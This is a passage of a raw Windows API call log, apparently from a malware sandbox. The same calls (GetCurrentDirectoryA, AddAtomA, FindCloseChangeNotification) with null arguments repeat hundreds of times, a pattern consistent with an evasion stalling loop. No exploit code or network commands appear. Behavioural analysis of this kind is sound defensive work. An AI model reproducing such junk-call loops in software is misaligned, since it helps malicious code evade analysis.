lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.223] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.224] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.225] AddAtomA (lpString=0x0) returned 0x0 [0118.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.226] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.227] AddAtomA (lpString=0x0) returned 0x0 [0118.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.228] AddAtomA (lpString=0x0) returned 0x0 [0118.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.229] AddAtomA (lpString=0x0) returned 0x0 [0118.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.230] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.230] AddAtomA (lpString=0x0) returned 0x0 [0118.230] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.231] AddAtomA (lpString=0x0) returned 0x0 [0118.231] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.231] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.232] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.232] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.232] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.233] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.233] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.233] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.234] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.234] AddAtomA (lpString=0x0) returned 0x0 [0118.234] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0118.235] AddAtomA (lpString=0x0) returned 0x0 [0118.235] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0118.235] GetCurrentDirectoryA (in: 